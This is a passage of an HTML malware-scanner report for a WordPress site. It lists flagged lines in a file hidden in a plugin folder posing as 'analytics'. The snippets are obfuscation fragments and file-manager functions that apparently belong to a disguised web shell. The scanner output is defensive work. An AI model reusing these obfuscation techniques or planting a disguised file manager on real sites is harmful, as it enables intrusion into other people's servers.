</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 179</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">_0x54</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x32</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x1a</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'\\'</span><span style="color: #007700">, </span><span style="color: #DD0000">'/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'DOCUMENT_ROOT'</span><span style="color: #007700">]), </span><span style="color: #DD0000">'/'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">displayPathItem</span><span style="color: #007700">(</span><span style="color: #0000BB">$title</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">) {print </span><span style="color: #DD0000">"<div class='path-nav'><strong></span><span style="color: #007700">{</span><span style="color: #0000BB">$title</span><span style="color: #007700">}</span><span style="color: #DD0000">:</strong>" </span><span style="color: #007700">. </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #DD0000">"</div>"</span><span style="color: #007700">;}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 25</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">PathCl</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">Result</span><span style="color: #007700">(</span><span style="color: #0000BB">$Int</span><span style="color: #007700">) {</span><span style="color: #0000BB">$I</span><span style="color: #007700">=array(</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'P'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Q'</span><span style="color: #007700">,</span><span style="color: #DD0000">'T'</span><span style="color: #007700">,</span><span style="color: #DD0000">'U'</span><span style="color: #007700">,</span><span style="color: #DD0000">'M'</span><span style="color: #007700">,</span><span style="color: #DD0000">'V'</span><span style="color: #007700">,</span><span style="color: #DD0000">'h'</span><span style="color: #007700">,</span><span style="color: #DD0000">'E'</span><span style="color: #007700">,</span><span style="color: #DD0000">'L'</span><span style="color: #007700">,</span><span style="color: #DD0000">'l'</span><span style="color: #007700">,</span><span style="color: #DD0000">'0'</span><span style="color: #007700">,</span><span style="color: #DD0000">'K'</span><span style="color: #007700">,</span><span style="color: #DD0000">'8'</span><span style="color: #007700">,</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'l'</span><span style="color: #007700">,</span><span style="color: #DD0000">'a'</span><span style="color: #007700">,</span><span style="color: #DD0000">'U'</span><span style="color: #007700">,</span><span style="color: #DD0000">'D'</span><span style="color: #007700">,</span><span style="color: #DD0000">'e'</span><span style="color: #007700">,</span><span style="color: #DD0000">'4'</span><span style="color: #007700">,</span><span style="color: #DD0000">'I'</span><span style="color: #007700">,</span><span style="color: #DD0000">'m'</span><span style="color: #007700">,</span><span style="color: #DD0000">'1'</span><span style="color: #007700">,</span><span style="color: #DD0000">'5'</span><span style="color: #007700">,</span><span style="color: #DD0000">'s'</span><span style="color: #007700">,</span><span style="color: #DD0000">'b'</span><span style="color: #007700">,</span><span style="color: #DD0000">'R'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Y'</span><span style="color: #007700">,</span><span style="color: #DD0000">'O'</span><span style="color: #007700">,</span><span style="color: #DD0000">'u'</span><span style="color: #007700">,</span><span style="color: #DD0000">'W'</span><span style="color: #007700">,</span><span style="color: #DD0000">'X'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Z'</span><span style="color: #007700">,</span><span style="color: #DD0000">'+'</span><span style="color: #007700">,</span><span style="color: #DD0000">'c'</span><span style="color: #007700">,</span><span style="color: #DD0000">'@'</span><span style="color: #007700">,</span><span style="color: #DD0000">'d'</span><span style="color: #007700">,</span><span style="color: #DD0000">'3'</span><span style="color: #007700">,</span><span style="color: #DD0000">'r'</span><span style="color: #007700">,</span><span style="color: #DD0000">'F'</span><span style="color: #007700">,</span><span style="color: #DD0000">')'</span><span style="color: #007700">,</span><span style="color: #DD0000">'B'</span><span style="color: #007700">,</span><span style="color: #DD0000">'y'</span><span style="color: #007700">,</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'J'</span><span style="color: #007700">,</span><span style="color: #DD0000">'q'</span><span style="color: #007700">,</span><span style="color: #DD0000">'G'</span><span style="color: #007700">,</span><span style="color: #DD0000">'#'</span><span style="color: #007700">,</span><span style="color: #DD0000">'S'</span><span style="color: #007700">,</span><span style="color: #DD0000">'o'</span><span style="color: #007700">,</span><span style="color: #DD0000">'H'</span><span style="color: #007700">,</span><span style="color: #DD0000">'4'</span><span style="color: #007700">,</span><span style="color: #DD0000">'A'</span><span style="color: #007700">,</span><span style="color: #DD0000">'i'</span><span style="color: #007700">,</span><span style="color: #DD0000">'j'</span><span style="color: #007700">,</span><span style="color: #DD0000">'t'</span><span style="color: #007700">,</span><span style="color: #DD0000">'v'</span><span style="color: #007700">,</span><span style="color: #DD0000">'w'</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">' / '</span><span style="color: #007700">, </span><span style="color: #0000BB">$breadcrumbs</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getPermissions</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 47</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"</span><span style="color: #0000BB">$readable</span><span style="color: #DD0000"> </span><span style="color: #0000BB">$writable</span><span style="color: #DD0000"> </span><span style="color: #0000BB">$executable</span><span style="color: #DD0000">"</span><span style="color: #007700">;}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">formatFileSize</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 50</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1073741824</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' GB'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 51</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1048576</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' MB'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 52</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1024</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' KB'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$bytes </span><span style="color: #007700">. </span><span style="color: #DD0000">' By'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">renderFileList</span><span style="color: #007700">(</span><span style="color: #0000BB">$GetPath</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 87</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">LoadFile</span><span style="color: #007700">(</span><span style="color: #0000BB">$GetPath</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ae7830db <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ae7830db)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Y2hy</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_246").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/analytics-1769473357/libs/UserAgent/front.page.template.1769473357.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.04 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 02:22:59</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 02:22:59</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 22</span><br><table id="file_247" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 109</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$__</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 56</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$_</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() { if (</span><span style="color: #0000BB">confirm</span><span style="color: #007700">(</span><span style="color: #DD0000">'Delete?'</span><span style="color: #007700">)) </span><span style="color: #0000BB">_0x02</span><span style="color: #007700">(</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0x17</span><span style="color: #007700">), </span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">getAttribute</span><span style="color: #007700">(</span><span style="color: #DD0000">'data-path'</span><span style="color: #007700">)); }); }); </span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">querySelectorAll</span><span style="color: #007700">(</span><span style="color: #DD0000">'.rename-btn'</span><span style="color: #007700">).forEach(</span><span style="color: #0000BB">_0x9b </span><span style="color: #007700">=> { </span><span style="color: #0000BB">_0x9b</span><span style="color: #007700">[</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0xf</span><span style="color: #007700">)](</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0x11</span><span style="color: #007700">), function() { const </span><span style="color: #0000BB">_0xname </span><span style="color: #007700">= </span><span style="color: #0000BB">prompt</span><span style="color: #007700">(</span><span style="color: #DD0000">'New name:'</span><span style="color: #007700">, </span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">getAttribute</span><span style="color: #007700">(</span><span style="color: #DD0000">'data-</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 13</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_absolute_root</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 173</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 176</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">_0x1b</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x2c</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 177</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">_0x5f2e</span><span style="color: #007700">[</span><span style="color: #0000BB">_0x1b</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$script_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$pos</span><span style="color: #007700">);}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 180</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">_0x54</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x32</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x1a</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'\\'</span><span style="color: #007700">, </span><span style="color: #DD0000">'/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'DOCUMENT_ROOT'</span><span style="color: #007700">]), </span><span style="color: #DD0000">'/'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 23</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">displayPathItem</span><span style="color: #007700">(</span><span style="color: #0000BB">$title</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">) {print </span><span style="color: #DD0000">"<div class='path-nav'><strong></span><span style="color: #007700">{</span><span style="color: #0000BB">$title</span><span style="color: #007700">}</span><span style="color: #DD0000">:</strong>" </span><span style="color: #007700">. </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #DD0000">"</div>"</span><span style="color: #007700">;}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 26</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">PathCl</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">' / '</span><span style="color: #007700">, </span><span style="color: #0000BB">$breadcrumbs</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 44</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getPermissions</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 48</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"</span><span style="color: #0000BB">$readable</span><span style="color: #DD0000"> </span><span style="color: #0000BB">$writable</span><span style="color: #DD0000"> </span><span style="color: #0000BB">$executable</span><span style="color: #DD0000">"</span><span style="color: #007700">;}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">Result</span><span style="color: #007700">(</span><span style="color: #0000BB">$Int</span><span style="color: #007700">) {</span><span style="color: #0000BB">$I</span><span style="color: #007700">=array(</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'P'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Q'</span><span style="color: #007700">,</span><span style="color: #DD0000">'T'</span><span style="color: #007700">,</span><span style="color: #DD0000">'U'</span><span style="color: #007700">,</span><span style="color: #DD0000">'M'</span><span style="color: #007700">,</span><span style="color: #DD0000">'V'</span><span style="color: #007700">,</span><span style="color: #DD0000">'h'</span><span style="color: #007700">,</span><span style="color: #DD0000">'E'</span><span style="color: #007700">,</span><span style="color: #DD0000">'L'</span><span style="color: #007700">,</span><span style="color: #DD0000">'l'</span><span style="color: #007700">,</span><span style="color: #DD0000">'0'</span><span style="color: #007700">,</span><span style="color: #DD0000">'K'</span><span style="color: #007700">,</span><span style="color: #DD0000">'8'</span><span style="color: #007700">,</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'l'</span><span style="color: #007700">,</span><span style="color: #DD0000">'a'</span><span style="color: #007700">,</span><span style="color: #DD0000">'U'</span><span style="color: #007700">,</span><span style="color: #DD0000">'D'</span><span style="color: #007700">,</span><span style="color: #DD0000">'e'</span><span style="color: #007700">,</span><span style="color: #DD0000">'4'</span><span style="color: #007700">,</span><span style="color: #DD0000">'I'</span><span style="color: #007700">,</span><span style="color: #DD0000">'m'</span><span style="color: #007700">,</span><span style="color: #DD0000">'1'</span><span style="color: #007700">,</span><span style="color: #DD0000">'5'</span><span style="color: #007700">,</span><span style="color: #DD0000">'s'</span><span style="color: #007700">,</span><span style="color: #DD0000">'b'</span><span style="color: #007700">,</span><span style="color: #DD0000">'R'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Y'</span><span style="color: #007700">,</span><span style="color: #DD0000">'O'</span><span style="color: #007700">,</span><span style="color: #DD0000">'u'</span><span style="color: #007700">,</span><span style="color: #DD0000">'W'</span><span style="color: #007700">,</span><span style="color: #DD0000">'X'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Z'</span><span style="color: #007700">,</span><span style="color: #DD0000">'+'</span><span style="color: #007700">,</span><span style="color: #DD0000">'c'</span><span style="color: #007700">,</span><span style="color: #DD0000">'@'</span><span style="color: #007700">,</span><span style="color: #DD0000">'d'</span><span style="color: #007700">,</span><span style="color: #DD0000">'3'</span><span style="color: #007700">,</span><span style="color: #DD0000">'r'</span><span style="color: #007700">,</span><span style="color: #DD0000">'F'</span><span style="color: #007700">,</span><span style="color: #DD0000">')'</span><span style="color: #007700">,</span><span style="color: #DD0000">'B'</span><span style="color: #007700">,</span><span style="color: #DD0000">'y'</span><span style="color: #007700">,</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'J'</span><span style="color: #007700">,</span><span style="color: #DD0000">'q'</span><span style="color: #007700">,</span><span style="color: #DD0000">'G'</span><span style="color: #007700">,</span><span style="color: #DD0000">'#'</span><span style="color: #007700">,</span><span style="color: #DD0000">'S'</span><span style="color: #007700">,</span><span style="color: #DD0000">'o'</span><span style="color: #007700">,</span><span style="color: #DD0000">'H'</span><span style="color: #007700">,</span><span style="color: #DD0000">'4'</span><span style="color: #007700">,</span><span style="color: #DD0000">'A'</span><span style="color: #007700">,</span><span style="color: #DD0000">'i'</span><span style="color: #007700">,</span><span style="color: #DD0000">'j'</span><span style="color: #007700">,</span><span style="color: #DD0000">'t'</span><span style="color: #007700">,</span><span style="color: #DD0000">'v'</span><span style="color: #007700">,</span><span style="color: #DD0000">'w'</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 50</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">formatFileSize</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 51</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1073741824</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' GB'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 52</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1048576</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' MB'</span><span style="color: #007700">; }</span>
</span>
